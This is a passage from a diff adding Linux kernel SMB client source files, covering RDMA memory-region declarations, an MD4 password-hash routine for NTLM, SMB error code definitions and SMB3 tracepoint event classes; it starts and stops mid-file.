++/* Interface for carrying upper layer I/O through send/recv */
++int smbd_recv(struct smbd_connection *info, struct msghdr *msg);
++int smbd_send(struct TCP_Server_Info *server,
++	int num_rqst, struct smb_rqst *rqst);
++
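++/*
++ * MR lifecycle: MR_READY entries are handed out by get_mr() and become
++ * MR_REGISTERED; after I/O they are invalidated and returned to
++ * MR_READY, while entries that hit an error become MR_ERROR and are
++ * rebuilt by smbd_mr_recovery_work().
++ */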
++enum mr_state {
++	MR_READY,
++	MR_REGISTERED,
++	MR_INVALIDATED,
++	MR_ERROR
++};
++
++struct smbd_mr {
++	struct smbd_connection	*conn;
++	struct list_head	list;
++	enum mr_state		state;
++	struct ib_mr		*mr;
++	struct scatterlist	*sgl;
++	int			sgl_count;
++	enum dma_data_direction	dir;
++	union {
++		struct ib_reg_wr	wr;
++		struct ib_send_wr	inv_wr;
++	};
++	struct ib_cqe		cqe;
++	bool			need_invalidate;
++	struct completion	invalidate_done;
++};
++
++/* Interfaces to register and deregister MR for RDMA read/write */
++struct smbd_mr *smbd_register_mr(
++	struct smbd_connection *info, struct page *pages[], int num_pages,
++	int offset, int tailsz, bool writing, bool need_invalidate);
++int smbd_deregister_mr(struct smbd_mr *mr);
++
++#else
++#define cifs_rdma_enabled(server)	0
++struct smbd_connection {};
++static inline void *smbd_get_connection(
++	struct TCP_Server_Info *server, struct sockaddr *dstaddr) {return NULL;}
++static inline int smbd_reconnect(struct TCP_Server_Info *server) {return -1; }
++static inline void smbd_destroy(struct TCP_Server_Info *server) {}
++static inline int smbd_recv(struct smbd_connection *info, struct msghdr *msg) {return -1; }
++static inline int smbd_send(struct TCP_Server_Info *server, int num_rqst, struct smb_rqst *rqst) {return -1; }
++#endif
++
++#endif
+diff --git a/fs/smb/client/smbencrypt.c b/fs/smb/client/smbencrypt.c
+new file mode 100644
+index 0000000000000..f0ce26414f173
+--- /dev/null
++++ b/fs/smb/client/smbencrypt.c
+@@ -0,0 +1,91 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++   Unix SMB/Netbios implementation.
++   Version 1.9.
++   SMB parameters and setup
++   Copyright (C) Andrew Tridgell 1992-2000
++   Copyright (C) Luke Kenneth Casson Leighton 1996-2000
++   Modified by Jeremy Allison 1995.
++   Copyright (C) Andrew Bartlett <abartlet@samba.org> 2002-2003
++   Modified by Steve French (sfrench@us.ibm.com) 2002-2003
++
++*/
++
++#include <linux/module.h>
++#include <linux/slab.h>
++#include <linux/fips.h>
++#include <linux/fs.h>
++#include <linux/string.h>
++#include <linux/kernel.h>
++#include <linux/random.h>
++#include "cifs_fs_sb.h"
++#include "cifs_unicode.h"
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifs_debug.h"
++#include "cifsproto.h"
++#include "../common/md4.h"
++
++#ifndef false
++#define false 0
++#endif
++#ifndef true
++#define true 1
++#endif
++
++/* following came from the other byteorder.h to avoid include conflicts */
++#define CVAL(buf,pos) (((unsigned char *)(buf))[pos])
++#define SSVALX(buf,pos,val) (CVAL(buf,pos)=(val)&0xFF,CVAL(buf,pos+1)=(val)>>8)
++#define SSVAL(buf,pos,val) SSVALX((buf),(pos),((__u16)(val)))
++
++/* produce an MD4 message digest from data of length n bytes */
++static int
++mdfour(unsigned char *md4_hash, unsigned char *link_str, int link_len)
++{
++	int rc;
++	struct md4_ctx mctx;
++
++	rc = cifs_md4_init(&mctx);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not init MD4\n", __func__);
++		goto mdfour_err;
++	}
++	rc = cifs_md4_update(&mctx, link_str, link_len);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not update MD4\n", __func__);
++		goto mdfour_err;
++	}
++	rc = cifs_md4_final(&mctx, md4_hash);
++	if (rc)
++		cifs_dbg(VFS, "%s: Could not finalize MD4\n", __func__);
++
++mdfour_err:
++	return rc;
++}
++
++/*
++ * Creates the MD4 hash of the user's password in NT UNICODE.
++ */
++
++int
++E_md4hash(const unsigned char *passwd, unsigned char *p16,
++	const struct nls_table *codepage)
++{
++	int rc;
++	int len;
++	__le16 wpwd[129];
++
++	/* Password cannot be longer than 128 characters */
++	if (passwd) /* Password must be converted to NT unicode */
++		len = cifs_strtoUTF16(wpwd, passwd, 128, codepage);
++	else {
++		len = 0;
++		*wpwd = 0; /* Ensure string is null terminated */
++	}
++
++	rc = mdfour(p16, (unsigned char *) wpwd, len * sizeof(__le16));
++	memzero_explicit(wpwd, sizeof(wpwd));
++
++	return rc;
++}
+diff --git a/fs/smb/client/smberr.h b/fs/smb/client/smberr.h
+new file mode 100644
+index 0000000000000..aeffdad829e2e
+--- /dev/null
++++ b/fs/smb/client/smberr.h
+@@ -0,0 +1,171 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2002,2004
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ *   See Error Codes section of the SNIA CIFS Specification
++ *   for more information
++ *
++ */
++
++#define SUCCESS	0x00	/* The request was successful. */
++#define ERRDOS	0x01	/* Error is from the core DOS operating system set */
++#define ERRSRV	0x02	/* Error is generated by the file server daemon */
++#define ERRHRD	0x03	/* Error is a hardware error. */
++#define ERRCMD	0xFF	/* Command was not in the "SMB" format. */
++
++/* The following error codes may be generated with the SUCCESS error class.*/
++
++/*#define SUCCESS	0	The request was successful. */
++
++/* The following error codes may be generated with the ERRDOS error class.*/
++
++#define ERRbadfunc		1	/* Invalid function. The server did not
++					   recognize or could not perform a
++					   system call generated by the server,
++					   e.g., set the DIRECTORY attribute on
++					   a data file, invalid seek mode. */
++#define ERRbadfile		2	/* File not found. The last component
++					   of a file's pathname could not be
++					   found. */
++#define ERRbadpath		3	/* Directory invalid. A directory
++					   component in a pathname could not be
++					   found. */
++#define ERRnofids		4	/* Too many open files. The server has
++					   no file handles available. */
++#define ERRnoaccess		5	/* Access denied, the client's context
++					   does not permit the requested
++					   function. This includes the
++					   following conditions: invalid rename
++					   command, write to Fid open for read
++					   only, read on Fid open for write
++					   only, attempt to delete a non-empty
++					   directory */
++#define ERRbadfid		6	/* Invalid file handle. The file handle
++					   specified was not recognized by the
++					   server. */
++#define ERRbadmcb		7	/* Memory control blocks destroyed. */
++#define ERRnomem		8	/* Insufficient server memory to
++					   perform the requested function. */
++#define ERRbadmem		9	/* Invalid memory block address. */
++#define ERRbadenv		10	/* Invalid environment. */
++#define ERRbadformat		11	/* Invalid format. */
++#define ERRbadaccess		12	/* Invalid open mode. */
++#define ERRbaddata		13	/* Invalid data (generated only by
++					   IOCTL calls within the server). */
++#define ERRbaddrive		15	/* Invalid drive specified. */
++#define ERRremcd		16	/* A Delete Directory request attempted
++					   to remove the server's current
++					   directory. */
++#define ERRdiffdevice		17	/* Not same device (e.g., a cross
++					   volume rename was attempted) */
++#define ERRnofiles		18	/* A File Search command can find no
++					   more files matching the specified
++					   criteria. */
++#define ERRwriteprot		19	/* media is write protected */
++#define ERRgeneral		31
++#define ERRbadshare		32	/* The sharing mode specified for an
++					   Open conflicts with existing FIDs on
++					   the file. */
++#define ERRlock			33	/* A Lock request conflicted with an
++					   existing lock or specified an
++					   invalid mode, or an Unlock request
++					   attempted to remove a lock held by
++					   another process. */
++#define ERRunsup		50
++#define ERRnosuchshare		67
++#define ERRfilexists		80	/* The file named in the request
++					   already exists. */
++#define ERRinvparm		87
++#define ERRdiskfull		112
++#define ERRinvname		123
++#define ERRinvlevel		124
++#define ERRdirnotempty		145
++#define ERRnotlocked		158
++#define ERRcancelviolation	173
++#define ERRalreadyexists	183
++#define ERRbadpipe		230
++#define ERRpipebusy		231
++#define ERRpipeclosing		232
++#define ERRnotconnected		233
++#define ERRmoredata		234
++#define ERReasnotsupported	282
++#define ErrQuota		0x200	/* The operation would cause a quota
++					   limit to be exceeded. */
++#define ErrNotALink		0x201	/* A link operation was performed on a
++					   pathname that was not a link. */
++
++/* The errors below are used internally only (they do not come over the wire),
++   for passthrough from STATUS codes to POSIX */
++#define ERRsymlink              0xFFFD
++#define ErrTooManyLinks         0xFFFE
++
++/* Following error codes may be generated with the ERRSRV error class.*/
++
++#define ERRerror		1	/* Non-specific error code. It is
++					   returned under the following
++					   conditions: resource other than disk
++					   space exhausted (e.g. TIDs), first
++					   SMB command was not negotiate,
++					   multiple negotiates attempted, and
++					   internal server error. */
++#define ERRbadpw		2	/* Bad password - name/password pair in
++					   a TreeConnect or Session Setup are
++					   invalid. */
++#define ERRbadtype		3	/* used for indicating DFS referral
++					   needed */
++#define ERRaccess		4	/* The client does not have the
++					   necessary access rights within the
++					   specified context for requested
++					   function. */
++#define ERRinvtid		5	/* The Tid specified in a command was
++					   invalid. */
++#define ERRinvnetname		6	/* Invalid network name in tree
++					   connect. */
++#define ERRinvdevice		7	/* Invalid device - printer request
++					   made to non-printer connection or
++					   non-printer request made to printer
++					   connection. */
++#define ERRqfull		49	/* Print queue full (files) -- returned
++					   by open print file. */
++#define ERRqtoobig		50	/* Print queue full -- no space. */
++#define ERRqeof			51	/* EOF on print queue dump */
++#define ERRinvpfid		52	/* Invalid print file FID. */
++#define ERRsmbcmd		64	/* The server did not recognize the
++					   command received. */
++#define ERRsrverror		65	/* The server encountered an internal
++					   error, e.g., system file
++					   unavailable. */
++#define ERRbadBID		66	/* (obsolete) */
++#define ERRfilespecs		67	/* The Fid and pathname parameters
++					   contained an invalid combination of
++					   values. */
++#define ERRbadLink		68	/* (obsolete) */
++#define ERRbadpermits		69	/* The access permissions specified for
++					   a file or directory are not a valid
++					   combination. */
++#define ERRbadPID		70
++#define ERRsetattrmode		71	/* attribute (mode) is invalid */
++#define ERRpaused		81	/* Server is paused */
++#define ERRmsgoff		82	/* reserved - messaging off */
++#define ERRnoroom		83	/* reserved - no room for message */
++#define ERRrmuns		87	/* reserved - too many remote names */
++#define ERRtimeout		88	/* operation timed out */
++#define ERRnoresource		89	/* No resources available for request
++					   */
++#define ERRtoomanyuids		90	/* Too many UIDs active on this session
++					   */
++#define ERRbaduid		91	/* The UID is not known as a valid user
++					   */
++#define ERRusempx		250	/* temporarily unable to use raw */
++#define ERRusestd		251	/* temporarily unable to use either raw
++					   or mpx */
++#define ERR_NOTIFY_ENUM_DIR	1024
++#define ERRnoSuchUser		2238	/* user account does not exist */
++#define ERRaccountexpired	2239
++#define ERRbadclient		2240	/* can not logon from this client */
++#define ERRbadLogonTime		2241	/* logon hours do not allow this */
++#define ERRpasswordExpired	2242
++#define ERRnetlogonNotStarted	2455
++#define ERRnosupport		0xFFFF
+diff --git a/fs/smb/client/trace.c b/fs/smb/client/trace.c
+new file mode 100644
+index 0000000000000..4654837871934
+--- /dev/null
++++ b/fs/smb/client/trace.c
+@@ -0,0 +1,8 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ *   Copyright (C) 2018, Microsoft Corporation.
++ *
++ *   Author(s): Steve French <stfrench@microsoft.com>
++ */
++#define CREATE_TRACE_POINTS
++#include "trace.h"
+diff --git a/fs/smb/client/trace.h b/fs/smb/client/trace.h
+new file mode 100644
+index 0000000000000..d3053bd8ae731
+--- /dev/null
++++ b/fs/smb/client/trace.h
+@@ -0,0 +1,1070 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ *   Copyright (C) 2018, Microsoft Corporation.
++ *
++ *   Author(s): Steve French <stfrench@microsoft.com>
++ */
++#undef TRACE_SYSTEM
++#define TRACE_SYSTEM cifs
++
++#if !defined(_CIFS_TRACE_H) || defined(TRACE_HEADER_MULTI_READ)
++#define _CIFS_TRACE_H
++
++#include <linux/tracepoint.h>
++#include <linux/net.h>
++#include <linux/inet.h>
++
++/*
++ * Please use this 3-part article as a reference for writing new tracepoints:
++ * https://lwn.net/Articles/379903/
++ */
++
++/* For logging errors in read or write */
++DECLARE_EVENT_CLASS(smb3_rw_err_class,
++	TP_PROTO(unsigned int xid,
++		__u64	fid,
++		__u32	tid,
++		__u64	sesid,
++		__u64	offset,
++		__u32	len,
++		int	rc),
++	TP_ARGS(xid, fid, tid, sesid, offset, len, rc),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u64, fid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(__u64, offset)
++		__field(__u32, len)
++		__field(int, rc)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->fid = fid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->offset = offset;
++		__entry->len = len;
++		__entry->rc = rc;
++	),
++	TP_printk("\txid=%u sid=0x%llx tid=0x%x fid=0x%llx offset=0x%llx len=0x%x rc=%d",
++		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
++		__entry->offset, __entry->len, __entry->rc)
++)
++
++#define DEFINE_SMB3_RW_ERR_EVENT(name)          \
++DEFINE_EVENT(smb3_rw_err_class, smb3_##name,    \
++	TP_PROTO(unsigned int xid,		\
++		__u64	fid,			\
++		__u32	tid,			\
++		__u64	sesid,			\
++		__u64	offset,			\
++		__u32	len,			\
++		int	rc),			\
++	TP_ARGS(xid, fid, tid, sesid, offset, len, rc))
++
++DEFINE_SMB3_RW_ERR_EVENT(write_err);
++DEFINE_SMB3_RW_ERR_EVENT(read_err);
++DEFINE_SMB3_RW_ERR_EVENT(query_dir_err);
++DEFINE_SMB3_RW_ERR_EVENT(zero_err);
++DEFINE_SMB3_RW_ERR_EVENT(falloc_err);
++
++
++/* For logging successful read or write */
++DECLARE_EVENT_CLASS(smb3_rw_done_class,
++	TP_PROTO(unsigned int xid,
++		__u64	fid,
++		__u32	tid,
++		__u64	sesid,
++		__u64	offset,
++		__u32	len),
++	TP_ARGS(xid, fid, tid, sesid, offset, len),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u64, fid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(__u64, offset)
++		__field(__u32, len)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->fid = fid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->offset = offset;
++		__entry->len = len;
++	),
++	TP_printk("xid=%u sid=0x%llx tid=0x%x fid=0x%llx offset=0x%llx len=0x%x",
++		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
++		__entry->offset, __entry->len)
++)
++
++#define DEFINE_SMB3_RW_DONE_EVENT(name)         \
++DEFINE_EVENT(smb3_rw_done_class, smb3_##name,   \
++	TP_PROTO(unsigned int xid,		\
++		__u64	fid,			\
++		__u32	tid,			\
++		__u64	sesid,			\
++		__u64	offset,			\
++		__u32	len),			\
++	TP_ARGS(xid, fid, tid, sesid, offset, len))
++
++DEFINE_SMB3_RW_DONE_EVENT(write_enter);
++DEFINE_SMB3_RW_DONE_EVENT(read_enter);
++DEFINE_SMB3_RW_DONE_EVENT(query_dir_enter);
++DEFINE_SMB3_RW_DONE_EVENT(zero_enter);
++DEFINE_SMB3_RW_DONE_EVENT(falloc_enter);
++DEFINE_SMB3_RW_DONE_EVENT(write_done);
++DEFINE_SMB3_RW_DONE_EVENT(read_done);
++DEFINE_SMB3_RW_DONE_EVENT(query_dir_done);
++DEFINE_SMB3_RW_DONE_EVENT(zero_done);
++DEFINE_SMB3_RW_DONE_EVENT(falloc_done);
++
++/* For logging successful set EOF (truncate) */
++DECLARE_EVENT_CLASS(smb3_eof_class,
++	TP_PROTO(unsigned int xid,
++		__u64	fid,
++		__u32	tid,
++		__u64	sesid,
++		__u64	offset),
++	TP_ARGS(xid, fid, tid, sesid, offset),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u64, fid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(__u64, offset)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->fid = fid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->offset = offset;
++	),
++	TP_printk("xid=%u sid=0x%llx tid=0x%x fid=0x%llx offset=0x%llx",
++		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
++		__entry->offset)
++)
++
++#define DEFINE_SMB3_EOF_EVENT(name)         \
++DEFINE_EVENT(smb3_eof_class, smb3_##name,   \
++	TP_PROTO(unsigned int xid,		\
++		__u64	fid,			\
++		__u32	tid,			\
++		__u64	sesid,			\
++		__u64	offset),		\
++	TP_ARGS(xid, fid, tid, sesid, offset))
++
++DEFINE_SMB3_EOF_EVENT(set_eof);
++
++/*
++ * For handle based calls other than read, write, and get/set info
++ */
++DECLARE_EVENT_CLASS(smb3_fd_class,
++	TP_PROTO(unsigned int xid,
++		__u64	fid,
++		__u32	tid,
++		__u64	sesid),
++	TP_ARGS(xid, fid, tid, sesid),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u64, fid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->fid = fid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++	),
++	TP_printk("\txid=%u sid=0x%llx tid=0x%x fid=0x%llx",
++		__entry->xid, __entry->sesid, __entry->tid, __entry->fid)
++)
++
++#define DEFINE_SMB3_FD_EVENT(name)          \
++DEFINE_EVENT(smb3_fd_class, smb3_##name,    \
++	TP_PROTO(unsigned int xid,		\
++		__u64	fid,			\
++		__u32	tid,			\
++		__u64	sesid),			\
++	TP_ARGS(xid, fid, tid, sesid))
++
++DEFINE_SMB3_FD_EVENT(flush_enter);
++DEFINE_SMB3_FD_EVENT(flush_done);
++DEFINE_SMB3_FD_EVENT(close_enter);
++DEFINE_SMB3_FD_EVENT(close_done);
++DEFINE_SMB3_FD_EVENT(oplock_not_found);
++
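++/* For logging errors on handle based calls */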
++DECLARE_EVENT_CLASS(smb3_fd_err_class,
++	TP_PROTO(unsigned int xid,
++		__u64	fid,
++		__u32	tid,
++		__u64	sesid,
++		int	rc),
++	TP_ARGS(xid, fid, tid, sesid, rc),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u64, fid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(int, rc)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->fid = fid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->rc = rc;
++	),
++	TP_printk("\txid=%u sid=0x%llx tid=0x%x fid=0x%llx rc=%d",
++		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
++		__entry->rc)
++)
++
++#define DEFINE_SMB3_FD_ERR_EVENT(name)          \
++DEFINE_EVENT(smb3_fd_err_class, smb3_##name,    \
++	TP_PROTO(unsigned int xid,		\
++		__u64	fid,			\
++		__u32	tid,			\
++		__u64	sesid,			\
++		int	rc),			\
++	TP_ARGS(xid, fid, tid, sesid, rc))
++
++DEFINE_SMB3_FD_ERR_EVENT(flush_err);
++DEFINE_SMB3_FD_ERR_EVENT(lock_err);
++DEFINE_SMB3_FD_ERR_EVENT(close_err);
++
++/*
++ * For handle based query/set info calls
++ */
++DECLARE_EVENT_CLASS(smb3_inf_enter_class,
++	TP_PROTO(unsigned int xid,
++		__u64	fid,
++		__u32	tid,
++		__u64	sesid,
++		__u8	infclass,
++		__u32	type),
++	TP_ARGS(xid, fid, tid, sesid, infclass, type),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u64, fid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(__u8, infclass)
++		__field(__u32, type)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->fid = fid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->infclass = infclass;
++		__entry->type = type;
++	),
++	TP_printk("xid=%u sid=0x%llx tid=0x%x fid=0x%llx class=%u type=0x%x",
++		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
++		__entry->infclass, __entry->type)
++)
++
++#define DEFINE_SMB3_INF_ENTER_EVENT(name)          \
++DEFINE_EVENT(smb3_inf_enter_class, smb3_##name,    \
++	TP_PROTO(unsigned int xid,		\
++		__u64	fid,			\
++		__u32	tid,			\
++		__u64	sesid,			\
++		__u8	infclass,		\
++		__u32	type),			\
++	TP_ARGS(xid, fid, tid, sesid, infclass, type))
++
++DEFINE_SMB3_INF_ENTER_EVENT(query_info_enter);
++DEFINE_SMB3_INF_ENTER_EVENT(query_info_done);
++DEFINE_SMB3_INF_ENTER_EVENT(notify_enter);
++DEFINE_SMB3_INF_ENTER_EVENT(notify_done);
++
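++/* For logging errors on query/set info and related calls */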
++DECLARE_EVENT_CLASS(smb3_inf_err_class,
++	TP_PROTO(unsigned int xid,
++		__u64	fid,
++		__u32	tid,
++		__u64	sesid,
++		__u8	infclass,
++		__u32	type,
++		int	rc),
++	TP_ARGS(xid, fid, tid, sesid, infclass, type, rc),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u64, fid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(__u8, infclass)
++		__field(__u32, type)
++		__field(int, rc)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->fid = fid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->infclass = infclass;
++		__entry->type = type;
++		__entry->rc = rc;
++	),
++	TP_printk("xid=%u sid=0x%llx tid=0x%x fid=0x%llx class=%u type=0x%x rc=%d",
++		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
++		__entry->infclass, __entry->type, __entry->rc)
++)
++
++#define DEFINE_SMB3_INF_ERR_EVENT(name)          \
++DEFINE_EVENT(smb3_inf_err_class, smb3_##name,    \
++	TP_PROTO(unsigned int xid,		\
++		__u64	fid,			\
++		__u32	tid,			\
++		__u64	sesid,			\
++		__u8	infclass,		\
++		__u32	type,			\
++		int	rc),			\
++	TP_ARGS(xid, fid, tid, sesid, infclass, type, rc))
++
++DEFINE_SMB3_INF_ERR_EVENT(query_info_err);
++DEFINE_SMB3_INF_ERR_EVENT(set_info_err);
++DEFINE_SMB3_INF_ERR_EVENT(notify_err);
++DEFINE_SMB3_INF_ERR_EVENT(fsctl_err);
++
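++/* For logging entry into path based (compound) operations */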
++DECLARE_EVENT_CLASS(smb3_inf_compound_enter_class,
++	TP_PROTO(unsigned int xid,
++		__u32	tid,
++		__u64	sesid,
++		const char *full_path),
++	TP_ARGS(xid, tid, sesid, full_path),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__string(path, full_path)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__assign_str(path, full_path);
++	),
++	TP_printk("xid=%u sid=0x%llx tid=0x%x path=%s",
++		__entry->xid, __entry->sesid, __entry->tid,
++		__get_str(path))
++)
++
++#define DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(name)     \
++DEFINE_EVENT(smb3_inf_compound_enter_class, smb3_##name,    \
++	TP_PROTO(unsigned int xid,		\
++		__u32	tid,			\
++		__u64	sesid,			\
++		const char *full_path),		\
++	TP_ARGS(xid, tid, sesid, full_path))
++
++DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(query_info_compound_enter);
++DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(posix_query_info_compound_enter);
++DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(hardlink_enter);
++DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(rename_enter);
++DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(rmdir_enter);
++DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(set_eof_enter);
++DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(set_info_compound_enter);
++DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(delete_enter);
++DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(mkdir_enter);
++DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(tdis_enter);
++
++
++DECLARE_EVENT_CLASS(smb3_inf_compound_done_class,
++	TP_PROTO(unsigned int xid,
++		__u32	tid,
++		__u64	sesid),
++	TP_ARGS(xid, tid, sesid),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++	),
++	TP_printk("xid=%u sid=0x%llx tid=0x%x",
++		__entry->xid, __entry->sesid, __entry->tid)
++)
++
++#define DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(name)     \
++DEFINE_EVENT(smb3_inf_compound_done_class, smb3_##name,    \
++	TP_PROTO(unsigned int xid,		\
++		__u32	tid,			\
++		__u64	sesid),			\
++	TP_ARGS(xid, tid, sesid))
++
++DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(query_info_compound_done);
++DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(posix_query_info_compound_done);
++DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(hardlink_done);
++DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(rename_done);
++DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(rmdir_done);
++DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(set_eof_done);
++DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(set_info_compound_done);
++DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(delete_done);
++DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(mkdir_done);
++DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(tdis_done);
++
++
++DECLARE_EVENT_CLASS(smb3_inf_compound_err_class,
++	TP_PROTO(unsigned int xid,
++		__u32	tid,
++		__u64	sesid,
++		int	rc),
++	TP_ARGS(xid, tid, sesid, rc),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(int, rc)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->rc = rc;
++	),
++	TP_printk("xid=%u sid=0x%llx tid=0x%x rc=%d",
++		__entry->xid, __entry->sesid, __entry->tid,
++		__entry->rc)
++)
++
++#define DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(name)     \
++DEFINE_EVENT(smb3_inf_compound_err_class, smb3_##name,    \
++	TP_PROTO(unsigned int xid,		\
++		__u32	tid,			\
++		__u64	sesid,			\
++		int rc),			\
++	TP_ARGS(xid, tid, sesid, rc))
++
++DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(query_info_compound_err);
++DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(posix_query_info_compound_err);
++DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(hardlink_err);
++DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(rename_err);
++DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(rmdir_err);
++DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(set_eof_err);
++DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(set_info_compound_err);
++DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(mkdir_err);
++DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(delete_err);
++DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(tdis_err);
++
++/*
++ * For logging SMB3 Status code and Command for responses which return errors
++ */
++DECLARE_EVENT_CLASS(smb3_cmd_err_class,
++	TP_PROTO(__u32	tid,
++		__u64	sesid,
++		__u16	cmd,
++		__u64	mid,
++		__u32	status,
++		int	rc),
++	TP_ARGS(tid, sesid, cmd, mid, status, rc),
++	TP_STRUCT__entry(
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(__u16, cmd)
++		__field(__u64, mid)
++		__field(__u32, status)
++		__field(int, rc)
++	),
++	TP_fast_assign(
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->cmd = cmd;
++		__entry->mid = mid;
++		__entry->status = status;
++		__entry->rc = rc;
++	),
++	TP_printk("\tsid=0x%llx tid=0x%x cmd=%u mid=%llu status=0x%x rc=%d",
++		__entry->sesid, __entry->tid, __entry->cmd, __entry->mid,
++		__entry->status, __entry->rc)
++)
++
++#define DEFINE_SMB3_CMD_ERR_EVENT(name)          \
++DEFINE_EVENT(smb3_cmd_err_class, smb3_##name,    \
++	TP_PROTO(__u32	tid,			\
++		__u64	sesid,			\
++		__u16	cmd,			\
++		__u64	mid,			\
++		__u32	status,			\
++		int	rc),			\
++	TP_ARGS(tid, sesid, cmd, mid, status, rc))
++
++DEFINE_SMB3_CMD_ERR_EVENT(cmd_err);
++
++DECLARE_EVENT_CLASS(smb3_cmd_done_class,
++	TP_PROTO(__u32	tid,
++		__u64	sesid,
++		__u16	cmd,
++		__u64	mid),
++	TP_ARGS(tid, sesid, cmd, mid),
++	TP_STRUCT__entry(
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(__u16, cmd)
++		__field(__u64, mid)
++	),
++	TP_fast_assign(
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->cmd = cmd;
++		__entry->mid = mid;
++	),
++	TP_printk("\tsid=0x%llx tid=0x%x cmd=%u mid=%llu",
++		__entry->sesid, __entry->tid,
++		__entry->cmd, __entry->mid)
++)
++
++#define DEFINE_SMB3_CMD_DONE_EVENT(name)          \
++DEFINE_EVENT(smb3_cmd_done_class, smb3_##name,    \
++	TP_PROTO(__u32	tid,			\
++		__u64	sesid,			\
++		__u16	cmd,			\
++		__u64	mid),			\
++	TP_ARGS(tid, sesid, cmd, mid))
++
++DEFINE_SMB3_CMD_DONE_EVENT(cmd_enter);
++DEFINE_SMB3_CMD_DONE_EVENT(cmd_done);
++DEFINE_SMB3_CMD_DONE_EVENT(ses_expired);
++
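++/* For logging request (mid) round trip times, e.g. for slow responses */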
++DECLARE_EVENT_CLASS(smb3_mid_class,
